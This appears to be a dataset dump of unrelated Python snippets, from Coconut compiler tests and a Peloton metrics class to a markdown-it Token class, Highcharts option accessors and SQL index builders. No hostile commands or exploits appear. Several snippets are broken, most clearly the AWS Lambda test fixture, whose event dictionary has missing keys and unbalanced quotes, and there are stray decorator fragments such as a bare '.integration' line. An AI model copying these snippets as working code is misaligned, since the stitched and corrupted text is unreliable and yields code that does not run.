code stringlengths 281 23.7M |
|---|
_test_func_names
class TestShell(unittest.TestCase):
    """End-to-end tests driving the `coconut` compiler through its CLI,
    Python API, import hook, and the xonsh/IPython/Jupyter integrations.

    NOTE: several tests are defined conditionally at class-creation time
    (PY2/MYPY/WINDOWS/XONSH/IPY flags), so the collected test set depends
    on the environment.
    """

    def test_version(self):
        # Smoke test: `coconut --version` must exit cleanly.
        call(['coconut', '--version'])

    def test_code(self):
        # Compile and run a snippet passed via -c; -s enables strict mode.
        call(['coconut', '-s', '-c', coconut_snip], assert_output=True)

    if (not PY2):
        def test_target_3_snip(self):
            # Python-3-only output compiled with an explicit -t3 target.
            call(['coconut', '-t3', '-c', target_3_snip], assert_output=True)

    if MYPY:
        def test_universal_mypy_snip(self):
            # Universal-target code run through MyPy; MyPy complaints expected.
            call(['coconut', '-c', mypy_snip, '--mypy'], assert_output=mypy_snip_err_3, check_errors=False, check_mypy=False)

        def test_sys_mypy_snip(self):
            call(['coconut', '--target', 'sys', '-c', mypy_snip, '--mypy'], assert_output=mypy_snip_err_3, check_errors=False, check_mypy=False)

        def test_no_wrap_mypy_snip(self):
            call(['coconut', '--target', 'sys', '--no-wrap', '-c', mypy_snip, '--mypy'], assert_output=mypy_snip_err_3, check_errors=False, check_mypy=False)

    def test_pipe(self):
        # Feed the source via stdin instead of -c.
        call((('echo ' + escape(coconut_snip)) + '| coconut -s'), shell=True, assert_output=True)

    def test_api(self):
        # Compile via the public coconut.api.parse entry point.
        call_python(['-c', (('from coconut.api import parse; exec(parse("' + coconut_snip) + '"))')], assert_output=True)

    def test_import_hook(self):
        # Compile-on-import via the auto-compilation import hook.
        with using_sys_path(src):
            with using_paths(runnable_compiled_loc, importable_compiled_loc):
                with using_coconut():
                    auto_compilation(True)
                    import runnable
                    reload(runnable)
                    assert (runnable.success == '<success>')

    def test_find_packages(self):
        with using_pys_in(agnostic_dir):
            with using_coconut():
                from coconut.api import find_packages, find_and_compile_packages
                assert (find_packages(cocotest_dir) == ['agnostic'])
                assert (find_and_compile_packages(cocotest_dir) == ['agnostic'])

    def test_runnable(self):
        run_runnable()

    def test_runnable_nowrite(self):
        # -n: compile without writing output files to disk.
        run_runnable(['-n'])

    def test_compile_runnable(self):
        with using_paths(runnable_py, importable_py):
            comp_runnable()
            call_python([runnable_py, '--arg'], assert_output=True)

    def test_import_runnable(self):
        with using_paths(runnable_py, importable_py):
            comp_runnable()
            # Run twice to exercise both the fresh and the cached import path.
            for _ in range(2):
                call_python([runnable_py, '--arg'], assert_output=True, convert_to_import=True)

    if ((not WINDOWS) and XONSH):
        def test_xontrib(self):
            # Drive a live xonsh session via pexpect and exercise the xontrib.
            p = spawn_cmd('xonsh')
            p.expect('$')
            p.sendline('xontrib load coconut')
            p.expect('$')
            p.sendline('!(ls -la) |> bool')
            p.expect('True')
            p.sendline("'1; 2' |> print")
            p.expect('1; 2')
            p.sendline('$ENV_VAR = "ABC"')
            p.expect('$')
            p.sendline('echo f"{$ENV_VAR}"; echo f"{$ENV_VAR}"')
            p.expect('ABC')
            p.expect('ABC')
            p.sendline('len("""1\n3\n5""")\n')
            p.expect('5')
            if ((not PYPY) or PY39):
                if PY36:
                    p.sendline('echo 123;; 123')
                    p.expect('123;; 123')
                p.sendline('echo abc; echo abc')
                p.expect('abc')
                p.expect('abc')
                p.sendline('echo abc; print(1 |> (.+1))')
                p.expect('abc')
                p.expect('2')
            p.sendline('execx("10 |> print")')
            p.expect('subprocess mode')
            p.sendline('xontrib unload coconut')
            p.expect('$')
            if (((not PYPY) or PY39) and PY36):
                # After unloading, Coconut syntax should fall back to subprocess mode.
                p.sendline('1 |> print')
                p.expect('subprocess mode')
            p.sendeof()
            if p.isalive():
                p.terminate()

    if (IPY and ((not WINDOWS) or PY35)):
        def test_ipython_extension(self):
            # On Windows a "Jupyter error" is tolerated in the output.
            call(['ipython', '--ext', 'coconut', '-c', ('%coconut ' + coconut_snip)], assert_output=((True,) + (('Jupyter error',) if WINDOWS else ())), stderr_first=WINDOWS, check_errors=(not WINDOWS), expect_retcode=(0 if (not WINDOWS) else None))

        def test_kernel_installation(self):
            call(['coconut', '--jupyter'], assert_output=kernel_installation_msg)
            (stdout, stderr, retcode) = call_output(['jupyter', 'kernelspec', 'list'])
            if (not stdout):
                # Some jupyter versions print the listing to stderr instead.
                (stdout, stderr) = (stderr, '')
            assert ((not retcode) and (not stderr)), stderr
            for kernel in ((icoconut_custom_kernel_name,) + icoconut_default_kernel_names):
                assert (kernel in stdout)

        if ((not WINDOWS) and (not PYPY)):
            def test_jupyter_console(self):
                p = spawn_cmd('coconut --jupyter console')
                p.expect('In', timeout=jupyter_timeout)
                p.sendline('%load_ext coconut')
                p.expect('In', timeout=jupyter_timeout)
                p.sendline('`exit`')
                if (sys.version_info[:2] != (3, 6)):
                    p.expect('Shutting down kernel|shutting down', timeout=jupyter_timeout)
                if p.isalive():
                    p.terminate()
class PelotonWorkoutMetrics(PelotonObject):
    """Aggregated metrics of a single Peloton workout.

    Built from the raw API payload: exposes the workout duration, the
    fitness discipline, per-metric summaries (as ``*_summary`` attributes)
    and the selected time-series metric categories as attributes.
    """

    def __init__(self, **kwargs):
        self.workout_duration = kwargs.get('duration')
        self.fitness_discipline = kwargs.get('segment_list')[0]['metrics_type']
        # Summary metrics we care about; 'total_output' gets a special name.
        wanted_summaries = ('total_output', 'distance', 'calories')
        for summary in kwargs.get('summaries'):
            slug = summary['slug']
            if slug in wanted_summaries:
                target = 'output_summary' if slug == 'total_output' else slug + '_summary'
                setattr(self, target, PelotonMetricSummary(**summary))
        # Time-series metric categories exposed directly under their slug.
        wanted_metrics = ('output', 'cadence', 'resistance', 'speed', 'heart_rate')
        for metric in kwargs.get('metrics'):
            if metric['slug'] in wanted_metrics:
                setattr(self, metric['slug'], PelotonMetric(**metric))

    def __str__(self):
        return self.fitness_discipline
class SetLastLoginTest(unittest.TestCase):
    """Test for the set_last_login Lambda handler on an /update_login event.

    NOTE(review): the bare tuple below looks like the argument list of a
    stripped ``@mock.patch('set_last_login.app.update_last_login', ...)``
    decorator, and the fixture payload in update_login_event has clearly
    been mangled (missing keys and quote characters) -- confirm against the
    original source before relying on this test.
    """
    ('set_last_login.app.update_last_login', side_effect=mocked_update_last_login)

    def test_build(self, update_last_login_mock):
        # The handler must call update_last_login exactly once.
        response = lambda_handler(self.update_login_event(), '')
        self.assertEqual(update_last_login_mock.call_count, 1)

    def update_login_event(self):
        # Canned API Gateway proxy event (payload partially corrupted; see class note).
        return {'resource': '/update_login', 'path': '/update_login', 'body': '', ' 'POST', 'headers': {'Accept': 'application/json, text/plain, */*', 'accept-encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5', 'Authorization': 'eyJraWQiOiJq1231235fOwKv46JpjurGKzvma17eqCoaw', 'CloudFront-Forwarded-Proto': ' 'CloudFront-Is-Desktop-Viewer': 'true', 'CloudFront-Is-Mobile-Viewer': 'false', 'CloudFront-Is-SmartTV-Viewer': 'false', 'CloudFront-Is-Tablet-Viewer': 'false', 'CloudFront-Viewer-Country': 'IE', 'Host': 'api.haohaotiantian.com', 'origin': ' 'Referer': ' 'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"', 'sec-ch-ua-mobile': '?0', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'cross-site', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'Via': '2.0 f8591238.cloudfront.net (CloudFront)', 'X-Amz-Cf-Id': 'rex4fmbUq5pvK123fj5bGvpw==', 'X-Amzn-Trace-Id': 'Root=1-60e123b7e7b70', 'X-Forwarded-For': '123', 'X-Forwarded-Port': '123', 'X-Forwarded-Proto': ' 'multiValueHeaders': {'Accept': ['application/json, text/plain, */*'], 'accept-encoding': ['gzip, deflate, br'], 'Accept-Language': ['en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5'], 'Authorization': ['eyJraWQiOiJqVmhFdEN4Y123vZ25pdG123GKzvma17eqCoaw'], 'CloudFront-Forwarded-Proto': [' 'CloudFront-Is-Desktop-Viewer': ['true'], 'CloudFront-Is-Mobile-Viewer': ['false'], 'CloudFront-Is-SmartTV-Viewer': ['false'], 'CloudFront-Is-Tablet-Viewer': ['false'], 'CloudFront-Viewer-Country': ['IE'], 'Host': ['api.haohaotiantian.com'], 'origin': [' 'Referer': [' 'sec-ch-ua': ['" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"'], 'sec-ch-ua-mobile': ['?0'], 'sec-fetch-dest': ['empty'], 'sec-fetch-mode': ['cors'], 'sec-fetch-site': ['cross-site'], 'User-Agent': ['Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'], 'Via': ['2.0 123.cloudfront.net (CloudFront)'], 'X-Amz-Cf-Id': ['rex4fmbU123BVnGAOV9sfj5bGvpw=='], 'X-Amzn-Trace-Id': ['Root=1-60e6d123b70'], 'X-Forwarded-For': ['123'], 'X-Forwarded-Port': ['443'], 'X-Forwarded-Proto': [' 'queryStringParameters': 'None', 'multiValueQueryStringParameters': 'None', 'pathParameters': 'None', 'stageVariables': 'None', 'requestContext': {'resourceId': '123', 'authorizer': {'claims': {'sub': '', 'aud': '123123', 'email_verified': 'true', 'event_id': 'cc6a7b68-e1bc-417b-9344-123', 'token_use': 'id', 'auth_time': '', 'iss': ' 'cognito:username': '', 'exp': 'Thu Jul 08 11:38:59 UTC 2021', 'iat': 'Thu Jul 08 10:38:59 UTC 2021', 'email': ''}}, 'resourcePath': '/update_login', ' 'GET', 'extendedRequestId': 'CJZWoF123FT_Q=', 'requestTime': '08/Jul/2021:10:38:59 +0000', 'path': '/update_login', 'accountId': '123', 'protocol': 'HTTP/1.1', 'stage': 'Prod', 'domainPrefix': 'api', 'requestTimeEpoch': 123, 'requestId': '11875c1237fec0aab', 'identity': {'cognitoIdentityPoolId': 'None', 'accountId': 'None', 'cognitoIdentityId': 'None', 'caller': 'None', 'sourceIp': '54', 'principalOrgId': 'None', 'accessKey': 'None', 'cognitoAuthenticationType': 'None', 'cognitoAuthenticationProvider': 'None', 'userArn': 'None', 'userAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'user': 'None'}, 'domainName': 'api.haohaotiantian.com', 'apiId': '123'}, 'isBase64Encoded': False}

if (__name__ == '__main__'):
    unittest.main()
# NOTE(review): the bare ".integration" below looks like the remnant of a
# stripped "@pytest.mark.integration" decorator -- confirm upstream.
.integration
class TestCheckResponseAuth():
    """Tests for common_utils.check_response_auth against a live API."""

    def test_check_response_auth_sys_exit(self) -> None:
        # An auth-protected endpoint response should make check_response_auth
        # terminate via SystemExit.
        response = requests.get('/api/v1/cryptography/encryption/key')
        with pytest.raises(SystemExit):
            common_utils.check_response_auth(response)

    def test_check_response_auth_ok(self) -> None:
        # The open health endpoint should pass the auth check.
        response = requests.get('/health')
        assert common_utils.check_response_auth(response)
def downgrade():
    """Alembic downgrade: remove the two split unique constraints on
    users_groups_roles and restore the original combined one."""
    table = 'users_groups_roles'
    for constraint in ('uq_ugr_user_group_role', 'uq_ugr_email_group_role'):
        op.drop_constraint(constraint, table, type_='unique')
    op.create_unique_constraint('uq_uer_user_group_role', table, ['user_id', 'group_id', 'role_id'])
class _TestSegmentPen(AbstractPen):
    """Test pen that records every drawing call as a PostScript-like
    command string; ``repr()`` yields the space-joined command log."""

    def __init__(self):
        self._commands = []

    def __repr__(self):
        return ' '.join(self._commands)

    def _record(self, command):
        # Append one already-formatted command to the log.
        self._commands.append(command)

    def moveTo(self, pt):
        self._record('%s %s moveto' % (pt[0], pt[1]))

    def lineTo(self, pt):
        self._record('%s %s lineto' % (pt[0], pt[1]))

    def curveTo(self, *pts):
        self._record('%s curveto' % ' '.join('%s %s' % pt for pt in pts))

    def qCurveTo(self, *pts):
        # A trailing None point (TrueType closed contour) is logged literally.
        formatted = ['None' if pt is None else '%s %s' % pt for pt in pts]
        self._record('%s qcurveto' % ' '.join(formatted))

    def closePath(self):
        self._record('closepath')

    def endPath(self):
        self._record('endpath')

    def addComponent(self, glyphName, transformation):
        self._record("'%s' %s addcomponent" % (glyphName, transformation))
@dc.dataclass(**DATACLASS_KWARGS)
class Token:
    """A single token produced by the markdown parser.

    NOTE(review): the original source had a bare ``(**DATACLASS_KWARGS)``
    line where a decorator belongs -- the ``@dc.dataclass`` decorator (and
    the ``@classmethod`` on ``from_dict``) appear to have been stripped and
    are restored here.
    """

    # Type of the token, e.g. "paragraph_open".
    type: str
    # HTML tag name, e.g. "p".
    tag: str
    # Level change: 1 = tag opened, 0 = self-closing, -1 = tag closed.
    nesting: Literal[-1, 0, 1]
    # HTML attributes; upstream serialises this as a list of [key, value] pairs.
    attrs: dict[str, str | int | float] = dc.field(default_factory=dict)
    # Source map info as [line_begin, line_end], or None when unavailable.
    map: list[int] | None = None
    # Nesting level, same meaning as `state.level`.
    level: int = 0
    # Child tokens, e.g. the inline content of a block token.
    children: list[Token] | None = None
    # Raw content for self-closing tokens (code, html, fence, ...).
    content: str = ''
    # Markup that produced the token ('*' for emphasis, fence string, ...).
    markup: str = ''
    # Extra info, e.g. the language string of a fenced code block.
    info: str = ''
    # Arbitrary plugin-defined data.
    meta: dict[Any, Any] = dc.field(default_factory=dict)
    # True for block-level tokens, False for inline tokens.
    block: bool = False
    # Hidden tokens are not rendered.
    hidden: bool = False

    def __post_init__(self) -> None:
        # Normalise whatever attrs representation was passed in to a dict.
        self.attrs = convert_attrs(self.attrs)

    def attrIndex(self, name: str) -> int:
        """Deprecated: return the positional index of *name* in attrs, or -1."""
        warnings.warn('Token.attrIndex should not be used, since Token.attrs is a dictionary', UserWarning)
        if name not in self.attrs:
            return -1
        return list(self.attrs.keys()).index(name)

    def attrItems(self) -> list[tuple[str, str | int | float]]:
        """Get the (key, value) list of attrs."""
        return list(self.attrs.items())

    def attrPush(self, attrData: tuple[str, str | int | float]) -> None:
        """Add a (name, value) attribute to the token."""
        name, value = attrData
        self.attrSet(name, value)

    def attrSet(self, name: str, value: str | int | float) -> None:
        """Set attribute *name* to *value*."""
        self.attrs[name] = value

    def attrGet(self, name: str) -> None | str | int | float:
        """Get the value of attribute *name*, or None if it does not exist."""
        return self.attrs.get(name, None)

    def attrJoin(self, name: str, value: str) -> None:
        """Join *value* to an existing str attribute via a space, or set it.

        Useful for operating on class lists.

        :raises TypeError: if the existing attribute is not a str.
        """
        if name in self.attrs:
            current = self.attrs[name]
            if not isinstance(current, str):
                raise TypeError(f"existing attr 'name' is not a str: {self.attrs[name]}")
            self.attrs[name] = f'{current} {value}'
        else:
            self.attrs[name] = value

    def copy(self, **changes: Any) -> Token:
        """Return a shallow copy of the token, with *changes* applied."""
        return dc.replace(self, **changes)

    def as_dict(self, *, children: bool=True, as_upstream: bool=True, meta_serializer: Callable[[dict[Any, Any]], Any] | None=None, filter: Callable[[str, Any], bool] | None=None, dict_factory: Callable[..., MutableMapping[str, Any]]=dict) -> MutableMapping[str, Any]:
        """Serialise the token to a mapping.

        :param children: recursively serialise child tokens as well
        :param as_upstream: mimic upstream JSON (attrs as pair list or None)
        :param meta_serializer: optional serializer for the ``meta`` field
        :param filter: keep only (key, value) pairs for which this returns True
        :param dict_factory: mapping constructor to use
        """
        mapping = dict_factory((f.name, getattr(self, f.name)) for f in dc.fields(self))
        if filter:
            mapping = dict_factory((k, v) for k, v in mapping.items() if filter(k, v))
        if as_upstream and 'attrs' in mapping:
            mapping['attrs'] = None if not mapping['attrs'] else [[k, v] for k, v in mapping['attrs'].items()]
        if meta_serializer and 'meta' in mapping:
            mapping['meta'] = meta_serializer(mapping['meta'])
        if children and mapping.get('children', None):
            mapping['children'] = [child.as_dict(children=children, filter=filter, dict_factory=dict_factory, as_upstream=as_upstream, meta_serializer=meta_serializer) for child in mapping['children']]
        return mapping

    @classmethod
    def from_dict(cls, dct: MutableMapping[str, Any]) -> Token:
        """Recursively create a Token (and its children) from a mapping."""
        token = cls(**dct)
        if token.children:
            token.children = [cls.from_dict(c) for c in token.children]
        return token
class JzCzhz(LCh):
    """JzCzhz: the cylindrical (lightness/chroma/hue) form of Jzazbz."""

    BASE = 'jzazbz'
    NAME = 'jzczhz'
    SERIALIZE = ('--jzczhz',)
    WHITE = WHITES['2deg']['D65']
    DYNAMIC_RANGE = 'hdr'
    CHANNEL_ALIASES = {'lightness': 'jz', 'chroma': 'cz', 'hue': 'hz', 'h': 'hz', 'c': 'cz', 'j': 'jz'}
    ACHROMATIC = Jzazbz.ACHROMATIC
    CHANNELS = (Channel('jz', 0.0, 1.0), Channel('cz', 0.0, 0.5), Channel('hz', 0.0, 360.0, flags=FLG_ANGLE, nans=ACHROMATIC.hue))

    def resolve_channel(self, index: int, coords: Vector) -> float:
        """Resolve a possibly undefined (NaN) channel to a concrete value.

        Chroma and hue fall back to the achromatic model's ideal values
        (computed with lightness clamped to be non-negative); any other
        channel falls back to its declared NaN default.
        """
        jz = coords[0]
        if jz < 0:
            jz = 0.0
        if index == 1:
            cz = coords[1]
            return self.ACHROMATIC.get_ideal_chroma(jz) if math.isnan(cz) else cz
        if index == 2:
            hz = coords[2]
            return self.ACHROMATIC.get_ideal_hue(jz, coords[1]) if math.isnan(hz) else hz
        value = coords[index]
        return self.channels[index].nans if math.isnan(value) else value

    def is_achromatic(self, coords: Vector) -> bool:
        """Negative lightness is treated as achromatic; otherwise defer to the model."""
        return coords[0] < 0.0 or self.ACHROMATIC.test(*self.normalize(coords))

    def hue_name(self) -> str:
        """Name of the hue channel."""
        return 'hz'
class Test_UnknownType(unittest.TestCase):
    """Feed bpdu.bpdu.parser a frame carrying an unknown BPDU type and check
    it falls back to returning the raw buffer instead of a parsed packet."""

    def setUp(self):
        # Common header fields.
        self.protocol_id = bpdu.PROTOCOL_IDENTIFIER
        self.version_id = bpdu.RstBPDUs.VERSION_ID
        self.bpdu_type = 222  # deliberately not a recognised BPDU type
        self.flags = 126
        # Root bridge identifier components.
        self.root_priority = 4096
        self.root_system_id_extension = 1
        self.root_mac_address = '12:34:56:78:9a:bc'
        self.root_path_cost = 2
        # Sending bridge identifier components.
        self.bridge_priority = 8192
        self.bridge_system_id_extension = 3
        self.bridge_mac_address = 'aa:aa:aa:aa:aa:aa'
        self.port_priority = 16
        self.port_number = 4
        # Timer values (in seconds, encoded below).
        self.message_age = 5
        self.max_age = 6
        self.hello_time = 7
        self.forward_delay = 8
        self.version_1_length = bpdu.VERSION_1_LENGTH
        # RST BPDU layout = base header + configuration fields + RST extras.
        self.fmt = ((bpdu.bpdu._PACK_STR + bpdu.ConfigurationBPDUs._PACK_STR[1:]) + bpdu.RstBPDUs._PACK_STR[1:])
        self.buf = struct.pack(self.fmt, self.protocol_id, self.version_id, self.bpdu_type, self.flags, bpdu.RstBPDUs.encode_bridge_id(self.root_priority, self.root_system_id_extension, self.root_mac_address), self.root_path_cost, bpdu.RstBPDUs.encode_bridge_id(self.bridge_priority, self.bridge_system_id_extension, self.bridge_mac_address), bpdu.RstBPDUs.encode_port_id(self.port_priority, self.port_number), bpdu.RstBPDUs._encode_timer(self.message_age), bpdu.RstBPDUs._encode_timer(self.max_age), bpdu.RstBPDUs._encode_timer(self.hello_time), bpdu.RstBPDUs._encode_timer(self.forward_delay), self.version_1_length)

    def test_parser(self):
        # Unknown type: parser returns the raw buffer and no parsed class.
        (r1, r2, _) = bpdu.bpdu.parser(self.buf)
        eq_(r1, self.buf)
        eq_(r2, None)
def test_resolve_unresolved_reaching_conditions():
    """resolve_unresolved_reaching_conditions should turn the reaching
    conditions attached to code nodes (R2, R3) into explicit condition
    nodes, producing a forest equal to the expected one built below."""
    # --- input forest: seq( code_1 [RC=R2], if(a){ code_2 } else { code_3 [RC=R3] } )
    asforest = AbstractSyntaxForest(condition_handler=ConditionHandler())
    code_node_1 = asforest.add_code_node([Assignment(var('u'), const(9))])
    code_node_1.reaching_condition = LogicCondition.initialize_symbol('R2', asforest.factory.logic_context)
    code_node_2 = asforest.add_code_node([Break()])
    code_node_3 = asforest.add_code_node([Assignment(var('v'), const(9)), Break()])
    code_node_3.reaching_condition = LogicCondition.initialize_symbol('R3', asforest.factory.logic_context)
    condition_node = asforest._add_condition_node_with(LogicCondition.initialize_symbol('a', asforest.factory.logic_context), code_node_2, code_node_3)
    seq_node = SeqNode(LogicCondition.initialize_symbol('R1', asforest.factory.logic_context))
    asforest._add_node(seq_node)
    asforest._add_edges_from(((seq_node, code_node_1), (seq_node, condition_node)))
    asforest._code_node_reachability_graph.add_reachability_from(((code_node_1, code_node_3), (code_node_1, code_node_2)))
    seq_node.sort_children()
    asforest.resolve_unresolved_reaching_conditions()
    # --- expected forest after resolving the reaching conditions ---
    resulting_asforest = AbstractSyntaxForest(condition_handler=ConditionHandler())
    code_node_1 = resulting_asforest.add_code_node([Assignment(var('u'), const(9))])
    code_node_2 = resulting_asforest.add_code_node([Break()])
    code_node_3 = resulting_asforest.add_code_node([Assignment(var('v'), const(9)), Break()])
    # NOTE(review): uses asforest.factory (not resulting_asforest.factory) --
    # presumably so both forests share one logic context; confirm intent.
    seq_node = asforest.factory.create_seq_node()
    resulting_asforest._add_node(seq_node)
    condition_node_r1 = resulting_asforest._add_condition_node_with(LogicCondition.initialize_symbol('R1', asforest.factory.logic_context), seq_node)
    condition_node_r2 = resulting_asforest._add_condition_node_with(LogicCondition.initialize_symbol('R2', asforest.factory.logic_context), code_node_1)
    condition_node_r3 = resulting_asforest._add_condition_node_with(LogicCondition.initialize_symbol('R3', asforest.factory.logic_context), code_node_3)
    condition_node = resulting_asforest._add_condition_node_with(LogicCondition.initialize_symbol('a', asforest.factory.logic_context), code_node_2, condition_node_r3)
    resulting_asforest._add_edges_from(((seq_node, condition_node_r2), (seq_node, condition_node)))
    resulting_asforest._code_node_reachability_graph.add_reachability_from(((code_node_1, code_node_3), (code_node_1, code_node_2)))
    seq_node.sort_children()
    assert ((len(asforest.get_roots) == 2) and any(((root == condition_node_r1) for root in asforest.get_roots)) and ASTComparator.compare(asforest, resulting_asforest))
def get_signatures_from_comments(comments):
    """Extract variable-to-type signatures from "transonic block" comments.

    Each "transonic block" marker starts a signature; an optional "->" return
    annotation is discarded and an optional surrounding parenthesis stripped.
    Within a signature, ';' separates type groups and each group is
    "<type> var1, var2, ...".

    Returns a list of dicts mapping variable name -> type string.
    """
    flat = comments.replace('#', '').replace('\n', '')
    # First pass: isolate the raw signature strings.
    raw_sigs = []
    for chunk in flat.split('transonic block')[1:]:
        sig = chunk.split('->', 1)[0].strip()
        if sig.startswith('('):
            sig = sig[1:find_index_closing_parenthesis(sig)]
        raw_sigs.append(sig)
    # Second pass: parse each signature into a {var: type} mapping.
    signatures = []
    for sig_str in raw_sigs:
        signature = {}
        for group in (part.strip() for part in sig_str.split(';')):
            if not group:
                continue
            type_as_str, vars_str = group.split(' ', 1)
            for var_str in vars_str.split(','):
                signature[var_str.strip()] = type_as_str
        signatures.append(signature)
    return signatures
class OptionPlotoptionsHeatmapSonificationDefaultinstrumentoptionsMappingGapbetweennotes(Options):
    """Accessors for the gapBetweenNotes mapping options (Highcharts sonification).

    NOTE(review): each accessor was defined twice (getter then setter), which
    in plain Python silently discards the getter -- the @property /
    @<name>.setter decorators appear to have been stripped from this
    generated file and are restored here.
    """

    @property
    def mapFunction(self):
        # Current configured value, or None when unset.
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesHeatmapSonificationContexttracksMappingTremoloSpeed(Options):
    """Accessors for the tremolo speed mapping options (Highcharts sonification).

    NOTE(review): each accessor was defined twice (getter then setter), which
    in plain Python silently discards the getter -- the @property /
    @<name>.setter decorators appear to have been stripped from this
    generated file and are restored here.
    """

    @property
    def mapFunction(self):
        # Current configured value, or None when unset.
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
class ActionRecordWorker(ParallelRolloutWorker):
    """Rollout worker that replays recorded action sequences.

    NOTE(review): ``run`` has no ``self``/``cls`` parameter, so the
    ``@staticmethod`` decorator was evidently stripped; it is restored here.
    """

    @staticmethod
    def run(env_config: DictConfig, wrapper_config: DictConfig, agent_config: DictConfig, deterministic: bool, max_episode_steps: int, record_trajectory: bool, input_directory: str, reporting_queue: Queue, seeding_queue: Queue) -> None:
        """Replay one action record per seed from *seeding_queue*, pushing
        recorded episode data (or an ExceptionReport) onto *reporting_queue*.
        """
        env_seed, agent_seed = None, None
        try:
            env, agent = RolloutRunner.init_env_and_agent(env_config, wrapper_config, max_episode_steps, agent_config, input_directory)
            assert isinstance(agent, ReplayRecordedActionsPolicy)
            if not isinstance(env, SpacesRecordingWrapper):
                BColors.print_colored('Adding SpacesRecordingWrapper on top of wrapper stack!', color=BColors.WARNING)
                env = SpacesRecordingWrapper.wrap(env)
            env, episode_recorder = ParallelRolloutWorker._setup_monitoring(env, record_trajectory)
            first_episode = True
            while True:
                if seeding_queue.empty():
                    if first_episode:
                        break
                    # Reset once more so the recorder flushes the last episode,
                    # then report it and stop.
                    try:
                        env.reset()
                        agent.reset()
                    except Exception as e:
                        logger.warning(f'''
Exception in event collection reset() encountered: {e}
{traceback.format_exc()}''')
                    reporting_queue.put(episode_recorder.get_last_episode_data())
                    break
                action_record_path = seeding_queue.get()
                agent.load_action_record(action_record_path)
                # Seed the env with the seed stored in the action record.
                env_seed = agent.action_record.seed
                env.seed(env_seed)
                try:
                    obs = env.reset()
                    agent.reset()
                    RolloutRunner.run_episode(env=env, agent=agent, obs=obs, deterministic=deterministic, render=False)
                    out_txt = f'agent_seed: {agent_seed} | {str((env.core_env if isinstance(env, MazeEnv) else env))}'
                    logger.info(out_txt)
                except Exception as e:
                    out_txt = f'''agent_seed: {agent_seed} | {str((env.core_env if isinstance(env, MazeEnv) else env))}
Exception encountered: {e}
{traceback.format_exc()}'''
                    logger.warning(out_txt)
                finally:
                    # Episode data only becomes available after the *next* reset,
                    # hence the first iteration has nothing to report yet.
                    if not first_episode:
                        reporting_queue.put(episode_recorder.get_last_episode_data())
                    first_episode = False
        except Exception as exception:
            # Ship the failure to the parent process before re-raising.
            exception_report = ExceptionReport(exception, traceback.format_exc(), env_seed, agent_seed)
            reporting_queue.put(exception_report)
            raise
def create_index_string(matview_name, index_name, idx):
    """Render a CREATE INDEX statement for *idx* on materialized view
    *matview_name*, using the 'create_index' SQL template.

    Side effect: when the index dict asks for clustering, the global
    CLUSTERING_INDEX is updated to this index's name.
    """
    if idx.get('cluster_on_this', False):
        # Remember which index the matview should later be CLUSTERed on.
        global CLUSTERING_INDEX
        CLUSTERING_INDEX = index_name
    method = idx.get('method', 'BTREE')
    unique_sql = 'UNIQUE ' if idx.get('unique', False) else ''
    where_sql = (' WHERE ' + idx['where']) if idx.get('where', None) else ''
    # B-tree indexes get a denser fillfactor.
    with_sql = ' WITH (fillfactor = 97)' if method.upper() == 'BTREE' else ''
    column_sql = []
    for col in idx['columns']:
        parts = [col['name']]
        if col.get('order', None):
            parts.append(col['order'])
        if col.get('collation', None):
            parts.append('COLLATE ' + col['collation'])
        if col.get('opclass', None):
            parts.append(col['opclass'])
        column_sql.append(' '.join(parts))
    return TEMPLATE['create_index'].format(unique_sql, index_name, matview_name, method, ', '.join(column_sql), with_sql, where_sql)
class NevergradSweeper(Sweeper):
    """Hydra sweeper plugin backed by the Nevergrad optimizer.

    Thin facade that delegates everything to NevergradSweeperImpl.
    """

    def __init__(self, optim: OptimConf, parametrization: Optional[DictConfig]):
        # Imported lazily so plugin discovery does not pay the impl import cost.
        from ._impl import NevergradSweeperImpl
        self.sweeper = NevergradSweeperImpl(optim, parametrization)

    def setup(self, *, hydra_context: HydraContext, task_function: TaskFunction, config: DictConfig) -> None:
        # Forward setup to the wrapped implementation.
        return self.sweeper.setup(hydra_context=hydra_context, task_function=task_function, config=config)

    def sweep(self, arguments: List[str]) -> None:
        # Forward the sweep (list of override strings) to the implementation.
        return self.sweeper.sweep(arguments)
def drop_columns(records, slices):
    """Yield each record with the sequence columns covered by *slices* removed.

    Mutates record.seq in place before yielding. *slices* is an iterable of
    slice objects interpreted against each record's own length.
    """
    for record in records:
        length = len(record)
        dropped = {index for sl in slices for index in range(*sl.indices(length))}
        mask = [index not in dropped for index in range(length)]
        record.seq = Seq(''.join(itertools.compress(record.seq, mask)))
        yield record
